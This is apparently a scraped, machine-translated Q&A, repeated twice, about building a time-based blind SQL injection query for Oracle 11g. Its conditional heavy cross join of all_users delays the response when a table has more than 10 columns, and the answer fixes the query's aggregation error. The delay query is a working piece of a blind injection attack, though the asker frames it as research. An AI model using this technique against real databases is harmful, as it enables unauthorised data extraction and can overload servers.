如何使 Oracle 11g 基于时间的 SQL 注入查询包括 count(*) case count(*)
How to make Oracle 11g Time-based SQL Injection Query including count(*) case count(*)
我尝试为我的研究制作基于时间的SQL注入示例查询
查询:
select case
when COUNT( * )>10
then ( select count( * )
from all_users A,
all_users B,
all_users C,
all_users D,
all_users E,
all_users F
)
else 2
end
from col
where tname='BBS';
ERROR at line 1:
ORA-00937: not a single-group group function
enter image description here
(select count(*) from all_users A, all_users B, all_users C, all_users D, all_users E, all_users F) :这是对 oracle11g 造成一些延迟的繁重查询
如果 BBS table 有超过 10 个列,我想在我的数据库中看到一些延迟,谢谢您的帮助!
您收到错误是因为 non-aggregated 列或标识符(在本例中为 the subquery with all_users dictionary views)不能与聚合列(在本例中为COUNT( * )>10)一起存在于 SELECT 查询列表,除非 non-aggregated 个在 GROUP BY 列表中。
所以,用聚合查询替换您的查询:
SELECT CASE
WHEN COUNT(*)>10
THEN MAX((SELECT COUNT( * )
FROM all_users A
CROSS JOIN all_users B
CROSS JOIN all_users C
CROSS JOIN all_users D
CROSS JOIN all_users E
CROSS JOIN all_users F))
ELSE 2
END AS result
FROM col
WHERE tname = 'BBS'
我尝试为我的研究制作基于时间的SQL注入示例查询
查询:
select case
when COUNT( * )>10
then ( select count( * )
from all_users A,
all_users B,
all_users C,
all_users D,
all_users E,
all_users F
)
else 2
end
from col
where tname='BBS';
ERROR at line 1:
ORA-00937: not a single-group group function
enter image description here
(select count(*) from all_users A, all_users B, all_users C, all_users D, all_users E, all_users F) :这是对 oracle11g 造成一些延迟的繁重查询
如果 BBS table 有超过 10 个列,我想在我的数据库中看到一些延迟,谢谢您的帮助!
您收到错误是因为 non-aggregated 列或标识符(在本例中为 the subquery with all_users dictionary views)不能与聚合列(在本例中为COUNT( * )>10)一起存在于 SELECT 查询列表,除非 non-aggregated 个在 GROUP BY 列表中。
所以,用聚合查询替换您的查询:
SELECT CASE
WHEN COUNT(*)>10
THEN MAX((SELECT COUNT( * )
FROM all_users A
CROSS JOIN all_users B
CROSS JOIN all_users C
CROSS JOIN all_users D
CROSS JOIN all_users E
CROSS JOIN all_users F))
ELSE 2
END AS result
FROM col
WHERE tname = 'BBS'